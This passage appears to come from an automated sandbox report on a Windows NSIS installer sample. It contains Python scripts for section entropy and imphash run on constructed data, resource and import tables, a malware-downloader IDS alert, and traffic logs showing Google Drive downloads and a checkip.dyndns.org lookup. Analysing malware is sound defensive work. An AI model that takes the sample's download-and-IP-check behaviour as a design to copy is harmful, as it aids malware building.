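    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}

# Values from the report's section table. PointerToRawData is not listed
# there, so it is assumed: sections laid out back to back from FIRST_RAW_PTR.
REPORT_SECTIONS = [
    # name,    VirtualSize, VirtualAddress, SizeOfRawData, Characteristics
    (b".text",  0x6409,  0x1000,  0x6600,  0x60000020),
    (b".rdata", 0x1396,  0x8000,  0x1400,  0x40000040),
    (b".data",  0x20358, 0xa000,  0x600,   0xC0000040),
    (b".ndata", 0x2a000, 0x2b000, 0x0,     0xC0000080),
    (b".rsrc",  0x21068, 0x55000, 0x21200, 0x40000040),
]
FIRST_RAW_PTR = 0x400  # assumed


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def flag_names(characteristics: int) -> list:
    return [name for bit, name in CHARACTERISTICS.items() if characteristics & bit]


def parse_section_headers(table: bytes, count: int) -> list:
    """Decode `count` consecutive IMAGE_SECTION_HEADER records from `table`."""
    sections = []
    for i in range(count):
        fields = SECTION_HEADER.unpack_from(table, i * SECTION_HEADER.size)
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = fields
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize,
            "raw_size": raw_size, "raw_ptr": raw_ptr,
            "characteristics": flag_names(chars),
        })
    return sections


def score_sections(sections: list, image: bytes, threshold: float = 7.0) -> list:
    """Attach the entropy of each section's raw bytes; flag high-entropy non-code sections."""
    for s in sections:
        body = image[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        s["entropy"] = round(shannon_entropy(body), 3)
        s["suspicious"] = (s["entropy"] >= threshold
                           and "IMAGE_SCN_CNT_CODE" not in s["characteristics"])
    return sections


def build_section_table() -> bytes:
    """Pack REPORT_SECTIONS into a section table as it follows the optional header."""
    out, ptr = b"", FIRST_RAW_PTR
    for name, vsize, va, raw, chars in REPORT_SECTIONS:
        out += SECTION_HEADER.pack(name.ljust(8, b"\0"), vsize, va, raw, ptr, 0, 0, 0, 0, chars)
        ptr += raw
    return out


def build_image() -> bytes:
    """Constructed file body (not the sample's bytes): zero filler, a repeating
    8-byte opcode pattern for .text (entropy exactly 3.0) and SHA-256-derived
    pseudo-random bytes for .rsrc, standing in for the packed NSIS payload."""
    total = FIRST_RAW_PTR + sum(raw for _, _, _, raw, _ in REPORT_SECTIONS)
    image = bytearray(total)
    text_ptr, text_len = FIRST_RAW_PTR, REPORT_SECTIONS[0][3]
    image[text_ptr:text_ptr + text_len] = b"\x55\x8b\xec\x83\xc4\x10\x33\xc0" * (text_len // 8)
    rsrc_len = REPORT_SECTIONS[4][3]
    rsrc_ptr = total - rsrc_len
    image[rsrc_ptr:rsrc_ptr + rsrc_len] = b"".join(
        hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(rsrc_len // 32))
    return bytes(image)


def analyze() -> list:
    """Parse the constructed table and score every section against the constructed image."""
    sections = parse_section_headers(build_section_table(), len(REPORT_SECTIONS))
    return score_sections(sections, build_image())


if __name__ == "__main__":
    for s in analyze():
        print("%-7s VA=%#07x raw=%#07x entropy=%5.3f %-10s %s" % (
            s["name"], s["virtual_address"], s["raw_size"], s["entropy"],
            "SUSPICIOUS" if s["suspicious"] else "ok", ", ".join(s["characteristics"])))
```

To run it against the real file, replace build_section_table() with the 40-byte records that start at e_lfanew + 4 + 20 + SizeOfOptionalHeader and build_image() with the file contents. Entropy alone does not tell a zlib/LZMA-compressed NSIS payload from an encrypted one; it only says which section to unpack next.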
Name           RVA      Size     Type  Language  Country  ZLIB Complexity
RT_BITMAP      0x554c0  0x368    Device independent bitmap graphic, 96 x 16 x 4, image size 768  English  United States  0.23623853211009174
RT_ICON        0x55828  0xc2a3   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced  English  United States  0.9966684729162903
RT_ICON        0x61ad0  0x86e0   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced  English  United States  0.990210843373494
RT_ICON        0x6a1b0  0x5085   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced  English  United States  0.9867559307233299
RT_ICON        0x6f238  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9600  English  United States  0.4358921161825726
RT_ICON        0x717e0  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4224  English  United States  0.4896810506566604
RT_ICON        0x72888  0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors  English  United States  0.5367803837953091
RT_ICON        0x73730  0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  English  United States  0.6913357400722022
RT_ICON        0x73fd8  0x668    Device independent bitmap graphic, 48 x 96 x 4, image size 1152  English  United States  0.38597560975609757
RT_ICON        0x74640  0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors  English  United States  0.4934971098265896
RT_ICON        0x74ba8  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088  English  United States  0.651595744680851
RT_ICON        0x75010  0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 512  English  United States  0.46908602150537637
RT_ICON        0x752f8  0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128  English  United States  0.5472972972972973
RT_DIALOG      0x75420  0x120    data  English  United States  0.53125
RT_DIALOG      0x75540  0x118    data  English  United States  0.5678571428571428
RT_DIALOG      0x75658  0x120    data  English  United States  0.5104166666666666
RT_DIALOG      0x75778  0xf8     data  English  United States  0.6330645161290323
RT_DIALOG      0x75870  0xa0     data  English  United States  0.6125
RT_DIALOG      0x75910  0x60     data  English  United States  0.7291666666666666
RT_GROUP_ICON  0x75970  0xae     data  English  United States  0.6091954022988506
RT_VERSION     0x75a20  0x308    data  English  United States  0.47036082474226804
RT_MANIFEST    0x75d28  0x33e    XML 1.0 document, ASCII text, with very long lines (830), with no line terminators  English  United States  0.5542168674698795
DLL           Import
KERNEL32.dll  ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll    GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll     SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll   SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll  AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll  ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
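The Import Hash listed under the static information (1f23f452093b5c1ff091a2f9fb4fa3e9) is derived from exactly this import table. The script below is an added example, not code from the report or from pefile; it implements the widely used imphash algorithm as pefile's get_imphash() defines it: each import becomes "<dll name without .dll/.ocx/.sys>.<function>", both lower-cased, the tokens are joined with commas in import-table order, and the hash is the MD5 of that string. Two caveats the example makes visible: the hash is order-sensitive, so it must be computed over the import table in file order (the grouped listing above need not match that order, which is why the sample's value should be confirmed with pefile on the file itself), and because these imports belong to the NSIS installer stub rather than to the payload, every installer built with the same NSIS version shares the value, which makes it a weak pivot for this sample. SAMPLE_IMPORTS is a constructed subset of the listing, so its hash is not the sample's.

```python
import hashlib

# Extensions the reference algorithm drops from the DLL name before hashing.
STRIPPED_EXTENSIONS = ("dll", "ocx", "sys")


def normalize_import(dll: str, func) -> str:
    """Turn one import-table entry into its 'dll.func' token.

    `func` is the imported symbol name, or an int for an ordinal-only import.
    The reference implementation resolves known ordinals (ws2_32, oleaut32)
    to names through a lookup table; this example implements only its
    'ordN' fallback for ordinals it does not know.
    """
    lib = dll.lower()
    base, dot, ext = lib.rpartition(".")
    if dot and ext in STRIPPED_EXTENSIONS:
        lib = base
    name = "ord%d" % func if isinstance(func, int) else func.lower()
    return "%s.%s" % (lib, name)


def imphash_string(imports) -> str:
    """`imports`: [(dll, [func, ...]), ...] in import-table order."""
    return ",".join(normalize_import(dll, f) for dll, funcs in imports for f in funcs)


def imphash(imports) -> str:
    """MD5 over the comma-joined token string (the value tools report as imphash)."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


# Constructed input: a subset of the report's import listing, kept in the
# report's order. Hashing a subset cannot reproduce the reported imphash.
SAMPLE_IMPORTS = [
    ("KERNEL32.dll", ["ExitProcess", "SetFileAttributesW", "Sleep", "GetTickCount", "CreateFileW"]),
    ("USER32.dll", ["GetSystemMenu", "SetClassLongW", "EnableMenuItem"]),
    ("ADVAPI32.dll", ["AdjustTokenPrivileges", "RegCreateKeyExW", "OpenProcessToken"]),
    ("ole32.dll", ["OleUninitialize", "OleInitialize", "CoTaskMemFree", "CoCreateInstance"]),
]


def order_matters() -> bool:
    """Why the hash must be taken in file order: the same imports listed
    DLL-by-DLL in another order hash to a different value."""
    return imphash(SAMPLE_IMPORTS) != imphash(list(reversed(SAMPLE_IMPORTS)))


if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

To compare with the reported value, feed the full import table of the sample (for example `[(e.dll.decode(), [i.name.decode() for i in e.imports]) for e in pe.DIRECTORY_ENTRY_IMPORT]` from pefile) rather than the listing above, or call pe.get_imphash() directly.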
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                        SID      Signature                                            Severity  Source IP     Source Port  Dest IP          Dest Port  Protocol
2025-01-11T01:15:33.617639+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.10  49708        142.250.181.238  443        TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 11, 2025 01:15:32.467848063 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:32.467906952 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:32.468131065 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:32.556783915 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:32.556798935 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.200089931 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.200159073 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.201005936 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.201060057 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.309113979 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.309132099 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.309603930 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.309652090 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.314172983 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.355326891 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.617616892 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.617671013 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.617679119 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.617832899 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.617968082 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.617997885 CET  443          49708      142.250.181.238  192.168.2.10
Jan 11, 2025 01:15:33.618068933 CET  49708        443        192.168.2.10     142.250.181.238
Jan 11, 2025 01:15:33.648571968 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:33.648607016 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:33.648688078 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:33.649111986 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:33.649135113 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:34.294859886 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:34.294981003 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:34.300157070 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:34.300194025 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:34.300507069 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:34.300591946 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:34.369452000 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:34.415335894 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.871890068 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.872066975 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.877708912 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.877882957 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.890187979 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.890436888 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.890450001 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.890547991 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.896512032 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.896588087 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.960163116 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.960221052 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.960302114 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.960314989 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.960380077 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.960380077 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.961471081 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.961993933 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.961999893 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.963160038 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.975481033 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.975593090 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.975610018 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.975620985 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.975646973 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.975744009 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.975749016 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.975856066 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.979990005 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.980068922 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.980077028 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.980149984 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.986210108 CET  443          49709      172.217.16.193   192.168.2.10
Jan 11, 2025 01:15:36.986346006 CET  49709        443        192.168.2.10     172.217.16.193
Jan 11, 2025 01:15:36.986355066 CET  443          49709      172.217.16.193   192.168.2.10
                                                        Jan 11, 2025 01:15:36.986455917 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.992605925 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.993123055 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.993133068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.993216038 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.998856068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.999038935 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.999047041 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.999126911 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.005641937 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.006400108 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.006411076 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.006486893 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.010459900 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.010801077 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.010812998 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.010893106 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.016216993 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.016341925 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.016350985 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.016407013 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.032540083 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.032598019 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.032810926 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.032810926 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.032820940 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.033179045 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050556898 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050628901 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050646067 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050656080 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050672054 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050925016 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050931931 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050982952 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050996065 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.051003933 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.051337957 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.051337957 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.051347017 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.051609039 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.054434061 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.054502010 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.054511070 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.054517984 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.054549932 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.054718971 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.060584068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.060674906 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.060682058 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.060925007 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.065463066 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.065712929 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.065721035 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.066783905 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.070652962 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.070712090 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.070719957 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.070768118 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.074042082 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.074255943 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.074263096 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.075320959 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.078949928 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.079008102 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.079015017 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.079061985 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.087824106 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088015079 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088032007 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.088044882 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088057041 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088092089 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.088109970 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.092675924 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.092725039 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.092732906 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.092957020 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.097564936 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.097631931 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.097645998 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.097728014 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.102333069 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.103333950 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.103341103 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.104690075 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.106204033 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.106260061 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.106395960 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.106820107 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110456944 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110511065 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110538960 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110546112 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110583067 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110601902 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110639095 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110687971 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110760927 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110780001 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110816956 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.728749037 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:15:37.733691931 CET8049710193.122.130.0192.168.2.10
                                                        Jan 11, 2025 01:15:37.734148026 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:15:37.734148026 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:15:37.739130974 CET8049710193.122.130.0192.168.2.10
                                                        Jan 11, 2025 01:15:41.206324100 CET8049710193.122.130.0192.168.2.10
                                                        Jan 11, 2025 01:15:41.255081892 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:16:04.824492931 CET4971080192.168.2.10193.122.130.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 01:15:32.456149101 CET | 61161 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 01:15:32.463021040 CET | 53 | 61161 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 01:15:33.639823914 CET | 52050 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 01:15:33.647726059 CET | 53 | 52050 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 01:15:37.717549086 CET | 52961 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 01:15:37.724399090 CET | 53 | 52961 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 01:15:32.456149101 CET | 192.168.2.10 | 1.1.1.1 | 0x8365 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:33.639823914 CET | 192.168.2.10 | 1.1.1.1 | 0x47f0 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:37.717549086 CET | 192.168.2.10 | 1.1.1.1 | 0xe616 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 01:15:32.463021040 CET | 1.1.1.1 | 192.168.2.10 | 0x8365 | No error (0) | drive.google.com | - | 142.250.181.238 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:33.647726059 CET | 1.1.1.1 | 192.168.2.10 | 0x47f0 | No error (0) | drive.usercontent.google.com | - | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:37.724399090 CET | 1.1.1.1 | 192.168.2.10 | 0xe616 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
